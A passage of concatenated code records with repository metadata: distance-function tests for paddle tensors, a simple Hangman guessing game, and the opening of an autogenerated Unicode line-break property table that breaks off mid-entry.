            np.array([[0, 27], [27, 0]]),
        ),
        (
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            np.array([[0]]),
        ),
        (
            paddle.to_tensor([[0, 0, 0]], dtype='float32'),
            paddle.to_tensor([[0, 0, 0]], dtype='float32'),
            np.array([[0]]),
        ),
        (
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            paddle.to_tensor([[19, 53, 201]], dtype='float32'),
            np.array([[42129]]),
        ),
    ),
)
def test_sqeuclidean(x_mat, y_mat, result):
    np.testing.assert_almost_equal(sqeuclidean(x_mat, y_mat), result, decimal=3)


@pytest.mark.parametrize(
    'x_mat, y_mat, result',
    (
        (
            paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
            paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
            np.array([[0, 5.19615242], [5.19615242, 0]]),
        ),
        (
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            np.array([[0]]),
        ),
        (
            paddle.to_tensor([[0, 0, 0]], dtype='float32'),
            paddle.to_tensor([[0, 0, 0]], dtype='float32'),
            np.array([[0]]),
        ),
        (
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            paddle.to_tensor([[19, 53, 201]], dtype='float32'),
            np.array([[205.2535018]]),
        ),
    ),
)
def test_euclidean(x_mat, y_mat, result):
    np.testing.assert_almost_equal(euclidean(x_mat, y_mat), result, decimal=3)
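# A minimal usage sketch of the functions under test (relies only on the
# imports above; the expected value follows the [1,2,3] vs [4,5,6] case in
# test_sqeuclidean: 3^2 + 3^2 + 3^2 = 27):
#
#   x = paddle.to_tensor([[1, 2, 3]], dtype='float32')
#   y = paddle.to_tensor([[4, 5, 6]], dtype='float32')
#   sqeuclidean(x, y)  # -> [[27.]]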
[record stats] avg_line_length: 31.580645 | max_line_length: 80 | alphanum_fraction: 0.485529 | (remaining per-record quality-signal columns omitted)

hexsha: db4193464719ae1b9697cb21dad8ef4dcda8e032 | size: 863 | ext: py | lang: Python
path: Hangman.py | repo: VikashK21/Hangman_Game_List | head: 3334c90ffc58cf59225222a45d561bd3f0b3fc60 | licenses: ["MIT"]
stars: 1 (2021-08-19T13:23:12.000Z to 2021-08-19T13:23:12.000Z) | issues: null | forks: null
content:
n = 0
a = ["RAJASTHAN"]
# One gallows drawing per wrong guess; the bare "\ " escapes in the original
# strings are doubled here so the literals are unambiguous.
b = ["+------+\n|\n|\n|\n|\n|\n|\n|\n|______\n",
     "\n+------+\n| |\n| O\n|\n|\n|\n|\n|\n|\n|______",
     "\n+------+\n| |\n| O\n| |\n| |\n|\n|\n|\n|\n|______",
     "\n+------+\n| |\n| O\n| /| \n| |\n|\n|\n|\n|\n|______",
     "\n+------+\n| |\n| O\n| /|\\ \n| |\n|\n|\n|\n|\n|______",
     "\n+------+\n| |\n| O\n| /|\\ \n| |\n| /\n|\n|\n|\n|______",
     "\n+------+\n| |\n| O\n| /|\\ \n| |\n| / \\ \n|\n|\n|______"]
print(" **HANGMAN**\n\nGuess a state of India.\n")
while n <= 6:
    choice = input("Enter a state name: ")
    if choice in a:  # `a` is already a list; the original's list(a) was redundant
        print('\nYou Won the Game.')
        break
    elif choice not in a:
        print(b[n])
        if n == 6:
            print('\nSorry You lost the Game.')
    n += 1
[record stats] avg_line_length: 57.533333 | max_line_length: 522 | alphanum_fraction: 0.338355 | (remaining per-record quality-signal columns omitted)

hexsha: db50f670015bf1910b93179006d4f0772dd0176b | size: 67,573 | ext: py | lang: Python
path: Sublime Text 3/Packages/backrefs/st3/backrefs/uniprops/unidata/linebreak.py | repo: anekeallen/Sublime-Text-3 | head: 8502b9089ca4223f8ba7ff168626a0dbe67713cb | licenses: ["MIT"]
stars: 7 (2016-01-20T01:44:36.000Z to 2019-01-29T11:52:39.000Z) | issues: 4 (2016-01-27T17:42:07.000Z to 2021-08-13T12:31:25.000Z) | forks: 2 (2015-11-15T09:11:34.000Z to 2019-01-29T11:52:41.000Z)
content:
"""Unicode Properties from Unicode version 6.1.0 (autogen)."""
unicode_line_break = {
"^ai": "\x00-\xa6\xa9\xab-\xb1\xb4-\xb5\xbb\xbf-\xd6\xd8-\xf6\xf8-\u02c6\u02c8\u02cc\u02ce-\u02cf\u02d1-\u02d7\u02dc\u02de-\u2014\u2017-\u201f\u2022-\u203a\u203c-\u2073\u2075-\u207e\u2080\u2085-\u2104\u2106-\u2112\u2114-\u2120\u2123-\u212a\u212c-\u2153\u2156-\u215a\u215c-\u215d\u215f\u216c-\u216f\u217a-\u2188\u218a-\u218f\u219a-\u21d1\u21d3\u21d5-\u21ff\u2201\u2204-\u2206\u2209-\u220a\u220c-\u220e\u2210\u2212-\u2214\u2216-\u2219\u221b-\u221c\u2221-\u2222\u2224\u2226\u222d\u222f-\u2233\u2238-\u223b\u223e-\u2247\u2249-\u224b\u224d-\u2251\u2253-\u225f\u2262-\u2263\u2268-\u2269\u226c-\u226d\u2270-\u2281\u2284-\u2285\u2288-\u2294\u2296-\u2298\u229a-\u22a4\u22a6-\u22be\u22c0-\u2311\u2313-\u245f\u24ff\u254c-\u254f\u2575-\u257f\u2590-\u2591\u2596-\u259f\u25a2\u25aa-\u25b1\u25b4-\u25b5\u25b8-\u25bb\u25be-\u25bf\u25c2-\u25c5\u25c9-\u25ca\u25cc-\u25cd\u25d2-\u25e1\u25e6-\u25ee\u25f0-\u2604\u2607-\u2608\u260a-\u260d\u2610-\u2613\u2618-\u261b\u261d\u261f-\u263f\u2641\u2643-\u265f\u2662\u2666\u266b\u266e\u2670-\u269d\u26a0-\u26bd\u26c0-\u26c3\u26ce\u26e2\u26e4-\u26e7\u2700-\u2756\u2758-\u2775\u2794-\u2b54\u2b5a-\u3247\u3250-\ufffc\ufffe-\U0001f0ff\U0001f10b-\U0001f10f\U0001f12e-\U0001f12f\U0001f16a-\U0001f16f\U0001f19b-\U0010ffff",
"^al": "\x00-\x22\x24-\x25\x27-\x29\x2b-\x3b\x3f\x5c\x5b-\x5c\x5d\x7b-\x7d\x7f-\xa5\xa7-\xa8\xaa-\xab\xad\xb0-\xb4\xb6-\xbf\xd7\xf7\u02c7-\u02cd\u02d0\u02d8-\u02db\u02dd\u02df\u0300-\u036f\u0378-\u0379\u037e-\u0383\u038b\u038d\u03a2\u0483-\u0489\u0528-\u0530\u0557-\u0558\u0560\u0588-\u05bf\u05c1-\u05c2\u05c4-\u05f2\u05f5-\u05ff\u0605\u0609-\u060d\u0610-\u061f\u064b-\u066c\u0670\u06d4\u06d6-\u06dc\u06df-\u06e4\u06e7-\u06e8\u06ea-\u06ed\u06f0-\u06f9\u070e\u0711\u0730-\u074c\u07a6-\u07b0\u07b2-\u07c9\u07eb-\u07f3\u07f8-\u07f9\u07fb-\u07ff\u0816-\u0819\u081b-\u0823\u0825-\u0827\u0829-\u082f\u083f\u0859-\u085d\u085f-\u089f\u08a1\u08ad-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u096f\u0978\u0980-\u0984\u098d-\u098e\u0991-\u0992\u09a9\u09b1\u09b3-\u09b5\u09ba-\u09bc\u09be-\u09cd\u09cf-\u09db\u09de\u09e2-\u09ef\u09f2-\u09f3\u09f9\u09fb-\u0a04\u0a0b-\u0a0e\u0a11-\u0a12\u0a29\u0a31\u0a34\u0a37\u0a3a-\u0a58\u0a5d\u0a5f-\u0a71\u0a75-\u0a84\u0a8e\u0a92\u0aa9\u0ab1\u0ab4\u0aba-\u0abc\u0abe-\u0acf\u0ad1-\u0adf\u0ae2-\u0aef\u0af1-\u0b04\u0b0d-\u0b0e\u0b11-\u0b12\u0b29\u0b31\u0b34\u0b3a-\u0b3c\u0b3e-\u0b5b\u0b5e\u0b62-\u0b6f\u0b78-\u0b82\u0b84\u0b8b-\u0b8d\u0b91\u0b96-\u0b98\u0b9b\u0b9d\u0ba0-\u0ba2\u0ba5-\u0ba7\u0bab-\u0bad\u0bba-\u0bcf\u0bd1-\u0bef\u0bf9\u0bfb-\u0c04\u0c0d\u0c11\u0c29\u0c34\u0c3a-\u0c3c\u0c3e-\u0c57\u0c5a-\u0c5f\u0c62-\u0c77\u0c80-\u0c84\u0c8d\u0c91\u0ca9\u0cb4\u0cba-\u0cbc\u0cbe-\u0cdd\u0cdf\u0ce2-\u0cf0\u0cf3-\u0d04\u0d0d\u0d11\u0d3b-\u0d3c\u0d3e-\u0d4d\u0d4f-\u0d5f\u0d62-\u0d6f\u0d76-\u0d79\u0d80-\u0d84\u0d97-\u0d99\u0db2\u0dbc\u0dbe-\u0dbf\u0dc7-\u0df3\u0df5-\u0e4e\u0e50-\u0eff\u0f01-\u0f04\u0f06-\u0f12\u0f14\u0f18-\u0f19\u0f20-\u0f29\u0f34-\u0f35\u0f37\u0f39-\u0f3f\u0f48\u0f6d-\u0f87\u0f8d-\u0fbf\u0fc6\u0fcd\u0fd0-\u0fd3\u0fd9-\u104b\u1050-\u109f\u10c6\u10c8-\u10cc\u10ce-\u10cf\u1100-\u11ff\u1249\u124e-\u124f\u1257\u1259\u125e-\u125f\u1289\u128e-\u128f\u12b1\u12b6-\u12b7\u12bf\u12c1\u12c6-\u12c7\u12d7\u1311\u1316-\u1317\u135b-\u135f\u1361\u137d-\u137f\u139a-\u139f\u13f5-\u1400\u1680\u169b-\u169f\u16eb-\u16ed\u16f1-\u16ff\u170d\u1712-\u171f\u1732-\u173f\u1752-\u175f\u176d\u1771-\u17d8\u17da-\u17ef\u17fa-\u17ff\u1802-\u1806\u1808-\u1809\u180b-\u181f\u1878-\u187f\u18a9\u18ab-\u18af\u18f6-\u18ff\u191d-\u193f\u1941-\u19df\u1a17-\u1a1d\u1a20-\u1b04\u1b34-\u1b44\u1b4c-\u1b5b\u1b5d-\u1b60\u1b6b-\u1b73\u1b7d-\u1b82\u1ba1-\u1bad\u1bb0-\u1bb9\u1be6-\u1bfb\u1c24-\u1c4c\u1c50-\u1c59\u1c7e-\u1cbf\u1cc8-\u1cd2\u1cd4-\u1ce8\u1ced\u1cf2-\u1cf4\u1cf7-\u1cff\u1dc0-\u1dff\u1f16-\u1f17\u1f1e-\u1f1f\u1f46-\u1f47\u1f4e-\u1f4f\u1f58\u1f5a\u1f5c\u1f5e\u1f7e-\u1f7f\u1fb5\u1fc5\u1fd4-\u1fd5\u1fdc\u1ff0-\u1ff1\u1ff5\u1ffd\u1fff-\u2016\u2018-\u2021\u2024-\u2037\u2039-\u203d\u2044-\u2049\u2056\u2058-\u205b\u205d-\u2060\u2065-\u206f\u2072-\u2074\u207d-\u207f\u2081-\u2084\u208d-\u208f\u209d-\u20ff\u2103\u2105\u2109\u2113\u2116\u2121-\u2122\u212b\u2154-\u2155\u215b\u215e\u2160-\u216b\u2170-\u2179\u2189-\u2199\u21d2\u21d4\u2200\u2202-\u2203\u2207-\u2208\u220b\u220f\u2211-\u2213\u2215\u221a\u221d-\u2220\u2223\u2225\u2227-\u222c\u222e\u2234-\u2237\u223c-\u223d\u2248\u224c\u2252\u2260-\u2261\u2264-\u2267\u226a-\u226b\u226e-\u226f\u2282-\u2283\u2286-\u2287\u2295\u2299\u22a5\u22bf\u2312\u2329-\u232a\u23f4-\u23ff\u2427-\u243f\u244b-\u24fe\u2500-\u254b\u2550-\u2574\u2580-\u258f\u2592-\u2595\u25a0-\u25a1\u25a3-\u25a9\u25b2-\u25b3\u25b6-\u25b7\u25bc-\u25bd\u25c0-\u25c1\u25c6-\u25c8\u25cb\u25ce-\u25d1\u25e2-\u25e5\u25ef\u2605-\u2606\u2609\u260e-\u260f\u2614-\u2617\u261c\u261e\u2640\u2642\u2660-\u2661\u2663-\u2665\u26
67-\u266a\u266c-\u266d\u266f\u269e-\u269f\u26be-\u26bf\u26c4-\u26cd\u26cf-\u26e1\u26e3\u26e8-\u2700\u2757\u275b-\u275e\u2762-\u2763\u2768-\u2793\u27c5-\u27c6\u27e6-\u27ef\u2983-\u2998\u29d8-\u29db\u29fc-\u29fd\u2b4d-\u2b4f\u2b55-\u2bff\u2c2f\u2c5f\u2cef-\u2cf1\u2cf4-\u2cfc\u2cfe-\u2cff\u2d26\u2d28-\u2d2c\u2d2e-\u2d2f\u2d68-\u2d6e\u2d70-\u2d7f\u2d97-\u2d9f\u2da7\u2daf\u2db7\u2dbf\u2dc7\u2dcf\u2dd7\u2ddf-\u2e15\u2e17-\u2e19\u2e1c-\u2e1d\u2e20-\u2e2e\u2e30-\u2e31\u2e33-\u2e34\u2e3a-\u4dbf\u4e00-\ua4cf\ua4fe-\ua4ff\ua60d-\ua60f\ua620-\ua629\ua62c-\ua63f\ua66f-\ua672\ua674-\ua67d\ua698-\ua69f\ua6f0-\ua6f1\ua6f3-\ua6ff\ua78f\ua794-\ua79f\ua7ab-\ua7f7\ua802\ua806\ua80b\ua823-\ua827\ua82c-\ua82f\ua838\ua83a-\ua83f\ua874-\ua881\ua8b4-\ua8f1\ua8fc-\ua909\ua926-\ua92f\ua947-\ua95e\ua960-\ua983\ua9b3-\ua9c0\ua9c7-\ua9c9\ua9ce\ua9d0-\ua9dd\ua9e0-\ua9ff\uaa29-\uaa3f\uaa43\uaa4c-\uaa5b\uaa5d-\uaadf\uaaeb-\uaaf1\uaaf5-\uab00\uab07-\uab08\uab0f-\uab10\uab17-\uab1f\uab27\uab2f-\uabbf\uabe3-\ufaff\ufb07-\ufb12\ufb18-\ufb28\ufb2a-\ufb4f\ufbc2-\ufbd2\ufd3e-\ufd4f\ufd90-\ufd91\ufdc8-\ufdef\ufdfc\ufdfe-\ufe6f\ufe75\ufefd-\uff65\uff67-\uff70\uff9e-\uff9f\uffbf-\uffc1\uffc8-\uffc9\uffd0-\uffd1\uffd8-\uffd9\uffdd-\uffe7\uffef-\uffff\U0001000c\U00010027\U0001003b\U0001003e\U0001004e-\U0001004f\U0001005e-\U0001007f\U000100fb-\U00010106\U00010134-\U00010136\U0001018b-\U0001018f\U0001019c-\U000101cf\U000101fd-\U0001027f\U0001029d-\U0001029f\U000102d1-\U000102ff\U0001031f\U00010324-\U0001032f\U0001034b-\U0001037f\U0001039e-\U0001039f\U000103c4-\U000103c7\U000103d0\U000103d6-\U000103ff\U0001049e-\U000107ff\U00010806-\U00010807\U00010809\U00010836\U00010839-\U0001083b\U0001083d-\U0001083e\U00010856-\U00010857\U00010860-\U000108ff\U0001091c-\U0001091f\U0001093a-\U0001093e\U00010940-\U0001097f\U000109b8-\U000109bd\U000109c0-\U000109ff\U00010a01-\U00010a0f\U00010a14\U00010a18\U00010a34-\U00010a3f\U00010a48-\U00010a57\U00010a59-\U00010a5f\U00010a80-\U00010aff\U00010b36-\U00010b3f\U00010b56-\U00010b57\U00010b73-\U00010b77\U00010b80-\U00010bff\U00010c49-\U00010e5f\U00010e7f-\U00011002\U00011038-\U00011048\U0001104e-\U00011051\U00011066-\U00011082\U000110b0-\U000110ba\U000110be-\U000110cf\U000110e9-\U00011102\U00011127-\U00011182\U000111b3-\U000111c0\U000111c5-\U000111c6\U000111c8-\U0001167f\U000116ab-\U00011fff\U0001236f-\U000123ff\U00012463-\U00012fff\U00013258-\U0001325d\U00013282\U00013286-\U00013289\U00013379-\U0001337b\U0001342f-\U000167ff\U00016a39-\U00016eff\U00016f45-\U00016f4f\U00016f51-\U00016f92\U00016fa0-\U0001cfff\U0001d0f6-\U0001d0ff\U0001d127-\U0001d128\U0001d165-\U0001d169\U0001d16d-\U0001d182\U0001d185-\U0001d18b\U0001d1aa-\U0001d1ad\U0001d1de-\U0001d1ff\U0001d242-\U0001d244\U0001d246-\U0001d2ff\U0001d357-\U0001d35f\U0001d372-\U0001d3ff\U0001d455\U0001d49d\U0001d4a0-\U0001d4a1\U0001d4a3-\U0001d4a4\U0001d4a7-\U0001d4a8\U0001d4ad\U0001d4ba\U0001d4bc\U0001d4c4\U0001d506\U0001d50b-\U0001d50c\U0001d515\U0001d51d\U0001d53a\U0001d53f\U0001d545\U0001d547-\U0001d549\U0001d551\U0001d6a6-\U0001d6a7\U0001d7cc-\U0001edff\U0001ee04\U0001ee20\U0001ee23\U0001ee25-\U0001ee26\U0001ee28\U0001ee33\U0001ee38\U0001ee3a\U0001ee3c-\U0001ee41\U0001ee43-\U0001ee46\U0001ee48\U0001ee4a\U0001ee4c\U0001ee50\U0001ee53\U0001ee55-\U0001ee56\U0001ee58\U0001ee5a\U0001ee5c\U0001ee5e\U0001ee60\U0001ee63\U0001ee65-\U0001ee66\U0001ee6b\U0001ee73\U0001ee78\U0001ee7d\U0001ee7f\U0001ee8a\U0001ee9c-\U0001eea0\U0001eea4\U0001eeaa\U0001eebc-\U0001eeef\U0001eef2-\U0001efff\U0001f02c-\U0001f02f\U0001f094-\U0001f09f\U0001f0af-\U0001f0b0\U0001f0bf-\U0001f0c0\U
0001f0d0\U0001f0e0-\U0001f12d\U0001f12f-\U0001f169\U0001f16c-\U0001f1e5\U0001f200-\U0001f2ff\U0001f321-\U0001f32f\U0001f336\U0001f37d-\U0001f37f\U0001f394-\U0001f39f\U0001f3c5\U0001f3cb-\U0001f3df\U0001f3f1-\U0001f3ff\U0001f43f\U0001f441\U0001f4f8\U0001f4fd-\U0001f4ff\U0001f53e-\U0001f53f\U0001f544-\U0001f54f\U0001f568-\U0001f5fa\U0001f641-\U0001f644\U0001f650-\U0001f67f\U0001f6c6-\U0001f6ff\U0001f774-\U0010ffff",
"^b2": "\x00-\u2013\u2015-\u2e39\u2e3c-\U0010ffff",
"^ba": "\x00-\x08\x0a-\x7b\x7d-\xac\xae-\u0589\u058b-\u05bd\u05bf-\u0963\u0966-\u0e59\u0e5c-\u0f0a\u0f0c-\u0f33\u0f35-\u0f7e\u0f80-\u0f84\u0f86-\u0fbd\u0fc0-\u0fd1\u0fd3-\u1049\u104c-\u1360\u1362-\u13ff\u1401-\u167f\u1681-\u16ea\u16ee-\u1734\u1737-\u17d3\u17d6-\u17d7\u17d9\u17db-\u1803\u1806-\u1b59\u1b5c\u1b61-\u1c3a\u1c40-\u1c7d\u1c80-\u1fff\u2007\u200b-\u200f\u2011\u2014-\u2026\u2028-\u2055\u2057\u205c\u2060-\u2cf9\u2cfd-\u2cfe\u2d00-\u2d6f\u2d71-\u2e0d\u2e16\u2e18\u2e1a-\u2e29\u2e2e-\u2e2f\u2e32\u2e35-\ua4fd\ua500-\ua60c\ua60e\ua610-\ua6f2\ua6f8-\ua8cd\ua8d0-\ua92d\ua930-\ua9c6\ua9ca-\uaa5c\uaa60-\uaaef\uaaf2-\uabea\uabec-\U000100ff\U00010103-\U0001039e\U000103a0-\U000103cf\U000103d1-\U00010856\U00010858-\U0001091e\U00010920-\U00010a4f\U00010a58-\U00010b38\U00010b40-\U00011046\U00011049-\U000110bd\U000110c2-\U0001113f\U00011144-\U000111c4\U000111c7\U000111c9-\U0001246f\U00012474-\U0010ffff",
"^bb": "\x00-\xb3\xb5-\u02c7\u02c9-\u02cb\u02cd-\u02de\u02e0-\u0f00\u0f05\u0f08\u0f0b-\u0fcf\u0fd2\u0fd4-\u1805\u1807-\u1ffc\u1ffe-\ua873\ua876-\U0010ffff",
"^bk": "\x00-\x0a\x0d-\u2027\u202a-\U0010ffff",
"^cb": "\x00-\ufffb\ufffd-\U0010ffff",
"^cj": "\x00-\u3040\u3042\u3044\u3046\u3048\u304a-\u3062\u3064-\u3082\u3084\u3086\u3088-\u308d\u308f-\u3094\u3097-\u30a0\u30a2\u30a4\u30a6\u30a8\u30aa-\u30c2\u30c4-\u30e2\u30e4\u30e6\u30e8-\u30ed\u30ef-\u30f4\u30f7-\u30fb\u30fd-\u31ef\u3200-\uff66\uff71-\U0010ffff",
"^cl": "\x00-\x5c\x7c\x5c\x7e-\u0f3a\u0f3c\u0f3e-\u169b\u169d-\u2045\u2047-\u207d\u207f-\u208d\u208f-\u2329\u232b-\u2768\u276a\u276c\u276e\u2770\u2772\u2774\u2776-\u27c5\u27c7-\u27e6\u27e8\u27ea\u27ec\u27ee\u27f0-\u2983\u2985\u2987\u2989\u298b\u298d\u298f\u2991\u2993\u2995\u2997\u2999-\u29d8\u29da\u29dc-\u29fc\u29fe-\u2e22\u2e24\u2e26\u2e28\u2e2a-\u3000\u3003-\u3008\u300a\u300c\u300e\u3010\u3012-\u3014\u3016\u3018\u301a\u301c-\u301d\u3020-\ufd3e\ufd40-\ufe10\ufe13-\ufe17\ufe19-\ufe35\ufe37\ufe39\ufe3b\ufe3d\ufe3f\ufe41\ufe43\ufe45-\ufe47\ufe49-\ufe4f\ufe51\ufe53-\ufe59\ufe5b\ufe5d\ufe5f-\uff08\uff0a-\uff0b\uff0d\uff0f-\uff3c\uff3e-\uff5c\uff5e-\uff5f\uff62\uff65-\U0001325a\U0001325e-\U00013281\U00013283-\U00013286\U00013288\U0001328a-\U00013379\U0001337c-\U0010ffff",
"^cm": "\x09-\x0d\x20-\x5c\x7e\x85\xa0-\u02ff\u034f\u035c-\u0362\u0370-\u0482\u048a-\u0590\u05be\u05c0\u05c3\u05c6\u05c8-\u060f\u061b-\u064a\u0660-\u066f\u0671-\u06d5\u06dd-\u06de\u06e5-\u06e6\u06e9\u06ee-\u0710\u0712-\u072f\u074b-\u07a5\u07b1-\u07ea\u07f4-\u0815\u081a\u0824\u0828\u082e-\u0858\u085c-\u08e3\u08ff\u0904-\u0939\u093d\u0950\u0958-\u0961\u0964-\u0980\u0984-\u09bb\u09bd\u09c5-\u09c6\u09c9-\u09ca\u09ce-\u09d6\u09d8-\u09e1\u09e4-\u0a00\u0a04-\u0a3b\u0a3d\u0a43-\u0a46\u0a49-\u0a4a\u0a4e-\u0a50\u0a52-\u0a6f\u0a72-\u0a74\u0a76-\u0a80\u0a84-\u0abb\u0abd\u0ac6\u0aca\u0ace-\u0ae1\u0ae4-\u0b00\u0b04-\u0b3b\u0b3d\u0b45-\u0b46\u0b49-\u0b4a\u0b4e-\u0b55\u0b58-\u0b61\u0b64-\u0b81\u0b83-\u0bbd\u0bc3-\u0bc5\u0bc9\u0bce-\u0bd6\u0bd8-\u0c00\u0c04-\u0c3d\u0c45\u0c49\u0c4e-\u0c54\u0c57-\u0c61\u0c64-\u0c81\u0c84-\u0cbb\u0cbd\u0cc5\u0cc9\u0cce-\u0cd4\u0cd7-\u0ce1\u0ce4-\u0d01\u0d04-\u0d3d\u0d45\u0d49\u0d4e-\u0d56\u0d58-\u0d61\u0d64-\u0d81\u0d84-\u0dc9\u0dcb-\u0dce\u0dd5\u0dd7\u0de0-\u0df1\u0df4-\u0f17\u0f1a-\u0f34\u0f36\u0f38\u0f3a-\u0f3d\u0f40-\u0f70\u0f7f\u0f85\u0f88-\u0f8c\u0f98\u0fbd-\u0fc5\u0fc7-\u135c\u1360-\u1711\u1715-\u1731\u1735-\u1751\u1754-\u1771\u1774-\u180a\u180e-\u18a8\u18aa-\u191f\u192c-\u192f\u193c-\u1a16\u1a1c-\u1a7e\u1a80-\u1aff\u1b05-\u1b33\u1b45-\u1b6a\u1b74-\u1b7f\u1b83-\u1ba0\u1bae-\u1be5\u1bf4-\u1c23\u1c38-\u1ccf\u1cd3\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5-\u1dbf\u1de7-\u1dfb\u1e00-\u200b\u2010-\u2029\u202f-\u2069\u2070-\u20cf\u20f1-\u2cee\u2cf2-\u2d7e\u2d80-\u2ddf\u2e00-\u3029\u3030-\u3098\u309b-\ua66e\ua673\ua67e-\ua69e\ua6a0-\ua6ef\ua6f2-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua828-\ua87f\ua882-\ua8b3\ua8c5-\ua8df\ua8f2-\ua925\ua92e-\ua946\ua954-\ua97f\ua984-\ua9b2\ua9c1-\uaa28\uaa37-\uaa42\uaa44-\uaa4b\uaa4e-\uaaea\uaaf0-\uaaf4\uaaf7-\uabe2\uabeb\uabee-\ufb1d\ufb1f-\ufdff\ufe10-\ufe1f\ufe27-\ufff8\ufffc-\U000101fc\U000101fe-\U00010a00\U00010a04\U00010a07-\U00010a0b\U00010a10-\U00010a37\U00010a3b-\U00010a3e\U00010a40-\U00010fff\U00011003-\U00011037\U00011047-\U0001107f\U00011083-\U000110af\U000110bb-\U000110ff\U00011103-\U00011126\U00011135-\U0001117f\U00011183-\U000111b2\U000111c1-\U000116aa\U000116b8-\U00016f50\U00016f7f-\U00016f8e\U00016f93-\U0001d164\U0001d16a-\U0001d16c\U0001d183-\U0001d184\U0001d18c-\U0001d1a9\U0001d1ae-\U0001d241\U0001d245-\U000e0000\U000e0002-\U000e001f\U000e0080-\U000e00ff\U000e01f0-\U0010ffff",
"^cp": "\x00-\x28\x2a-\x5c\x5c\x5c\x5e-\U0010ffff",
"^cr": "\x00-\x0c\x0e-\U0010ffff",
"^ex": "\x00-\x20\x22-\x3e\x40-\u05c5\u05c7-\u061a\u061c-\u061d\u0620-\u06d3\u06d5-\u07f8\u07fa-\u0f0c\u0f12-\u0f13\u0f15-\u1801\u1804-\u1807\u180a-\u1943\u1946-\u2761\u2764-\u2cf8\u2cfa-\u2cfd\u2cff-\u2e2d\u2e2f-\ua60d\ua60f-\ua875\ua878-\ufe14\ufe17-\ufe55\ufe58-\uff00\uff02-\uff1e\uff20-\U0010ffff",
"^gl": "\x00-\x9f\xa1-\u034e\u0350-\u035b\u0363-\u0f07\u0f09-\u0f0b\u0f0d-\u0f11\u0f13-\u0fd8\u0fdb-\u180d\u180f-\u2006\u2008-\u2010\u2012-\u202e\u2030-\U0010ffff",
"^h2": "\x00-\uabff\uac01-\uac1b\uac1d-\uac37\uac39-\uac53\uac55-\uac6f\uac71-\uac8b\uac8d-\uaca7\uaca9-\uacc3\uacc5-\uacdf\uace1-\uacfb\uacfd-\uad17\uad19-\uad33\uad35-\uad4f\uad51-\uad6b\uad6d-\uad87\uad89-\uada3\uada5-\uadbf\uadc1-\uaddb\uaddd-\uadf7\uadf9-\uae13\uae15-\uae2f\uae31-\uae4b\uae4d-\uae67\uae69-\uae83\uae85-\uae9f\uaea1-\uaebb\uaebd-\uaed7\uaed9-\uaef3\uaef5-\uaf0f\uaf11-\uaf2b\uaf2d-\uaf47\uaf49-\uaf63\uaf65-\uaf7f\uaf81-\uaf9b\uaf9d-\uafb7\uafb9-\uafd3\uafd5-\uafef\uaff1-\ub00b\ub00d-\ub027\ub029-\ub043\ub045-\ub05f\ub061-\ub07b\ub07d-\ub097\ub099-\ub0b3\ub0b5-\ub0cf\ub0d1-\ub0eb\ub0ed-\ub107\ub109-\ub123\ub125-\ub13f\ub141-\ub15b\ub15d-\ub177\ub179-\ub193\ub195-\ub1af\ub1b1-\ub1cb\ub1cd-\ub1e7\ub1e9-\ub203\ub205-\ub21f\ub221-\ub23b\ub23d-\ub257\ub259-\ub273\ub275-\ub28f\ub291-\ub2ab\ub2ad-\ub2c7\ub2c9-\ub2e3\ub2e5-\ub2ff\ub301-\ub31b\ub31d-\ub337\ub339-\ub353\ub355-\ub36f\ub371-\ub38b\ub38d-\ub3a7\ub3a9-\ub3c3\ub3c5-\ub3df\ub3e1-\ub3fb\ub3fd-\ub417\ub419-\ub433\ub435-\ub44f\ub451-\ub46b\ub46d-\ub487\ub489-\ub4a3\ub4a5-\ub4bf\ub4c1-\ub4db\ub4dd-\ub4f7\ub4f9-\ub513\ub515-\ub52f\ub531-\ub54b\ub54d-\ub567\ub569-\ub583\ub585-\ub59f\ub5a1-\ub5bb\ub5bd-\ub5d7\ub5d9-\ub5f3\ub5f5-\ub60f\ub611-\ub62b\ub62d-\ub647\ub649-\ub663\ub665-\ub67f\ub681-\ub69b\ub69d-\ub6b7\ub6b9-\ub6d3\ub6d5-\ub6ef\ub6f1-\ub70b\ub70d-\ub727\ub729-\ub743\ub745-\ub75f\ub761-\ub77b\ub77d-\ub797\ub799-\ub7b3\ub7b5-\ub7cf\ub7d1-\ub7eb\ub7ed-\ub807\ub809-\ub823\ub825-\ub83f\ub841-\ub85b\ub85d-\ub877\ub879-\ub893\ub895-\ub8af\ub8b1-\ub8cb\ub8cd-\ub8e7\ub8e9-\ub903\ub905-\ub91f\ub921-\ub93b\ub93d-\ub957\ub959-\ub973\ub975-\ub98f\ub991-\ub9ab\ub9ad-\ub9c7\ub9c9-\ub9e3\ub9e5-\ub9ff\uba01-\uba1b\uba1d-\uba37\uba39-\uba53\uba55-\uba6f\uba71-\uba8b\uba8d-\ubaa7\ubaa9-\ubac3\ubac5-\ubadf\ubae1-\ubafb\ubafd-\ubb17\ubb19-\ubb33\ubb35-\ubb4f\ubb51-\ubb6b\ubb6d-\ubb87\ubb89-\ubba3\ubba5-\ubbbf\ubbc1-\ubbdb\ubbdd-\ubbf7\ubbf9-\ubc13\ubc15-\ubc2f\ubc31-\ubc4b\ubc4d-\ubc67\ubc69-\ubc83\ubc85-\ubc9f\ubca1-\ubcbb\ubcbd-\ubcd7\ubcd9-\ubcf3\ubcf5-\ubd0f\ubd11-\ubd2b\ubd2d-\ubd47\ubd49-\ubd63\ubd65-\ubd7f\ubd81-\ubd9b\ubd9d-\ubdb7\ubdb9-\ubdd3\ubdd5-\ubdef\ubdf1-\ube0b\ube0d-\ube27\ube29-\ube43\ube45-\ube5f\ube61-\ube7b\ube7d-\ube97\ube99-\ubeb3\ubeb5-\ubecf\ubed1-\ubeeb\ubeed-\ubf07\ubf09-\ubf23\ubf25-\ubf3f\ubf41-\ubf5b\ubf5d-\ubf77\ubf79-\ubf93\ubf95-\ubfaf\ubfb1-\ubfcb\ubfcd-\ubfe7\ubfe9-\uc003\uc005-\uc01f\uc021-\uc03b\uc03d-\uc057\uc059-\uc073\uc075-\uc08f\uc091-\uc0ab\uc0ad-\uc0c7\uc0c9-\uc0e3\uc0e5-\uc0ff\uc101-\uc11